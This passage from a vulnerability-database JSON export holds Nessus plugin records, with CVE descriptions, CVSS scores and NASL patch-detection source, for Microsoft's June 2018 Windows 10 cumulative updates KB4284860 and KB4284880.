test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.491\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.491\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-19T05:13:14", 
"description": "The remote Windows host is missing security update 4284860.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2018-8236)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. 
However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2018-0978)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2018-1036)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284860: Windows 10 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8225"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284860.NASL", "href": "https://www.tenable.com/plugins/nessus/110489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110489);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0978\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8169\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8215\",\n \"CVE-2018-8216\",\n \"CVE-2018-8217\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104328,\n 104331,\n 104333,\n 104334,\n 104336,\n 104337,\n 104338,\n 104340,\n 104343,\n 104356,\n 104360,\n 104361,\n 104364,\n 104369,\n 104373,\n 104379,\n 104389,\n 104391,\n 104393,\n 104395,\n 104398,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284860\");\n script_xref(name:\"MSFT\", value:\"MS18-4284860\");\n\n script_name(english:\"KB4284860: Windows 10 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284860.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. 
(CVE-2018-8235)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. 
However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2018-8207)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2018-1036)\");\n # https://support.microsoft.com/en-us/help/4284860/windows-10-update-kb4284860\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?686a6741\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4284860.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284860');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284860])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:14", "description": "The remote Windows host is missing security update 4284880.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
(CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. 
(CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. 
a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. 
Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. 
(CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284880: Windows 10 Version 1607 and Windows Server 2016 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8214", "CVE-2018-8225"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284880.NASL", "href": "https://www.tenable.com/plugins/nessus/110491", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110491);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8169\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8216\",\n \"CVE-2018-8217\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104328,\n 104331,\n 104333,\n 104334,\n 104336,\n 104337,\n 104338,\n 104340,\n 104343,\n 104353,\n 104356,\n 104360,\n 104361,\n 104364,\n 104369,\n 104373,\n 104379,\n 104382,\n 104389,\n 104391,\n 104392,\n 104393,\n 104394,\n 104395,\n 104398,\n 104401,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284880\");\n script_xref(name:\"MSFT\", value:\"MS18-4284880\");\n\n script_name(english:\"KB4284880: Windows 10 Version 1607 and Windows Server 2016 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284880.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. 
An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8229)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. 
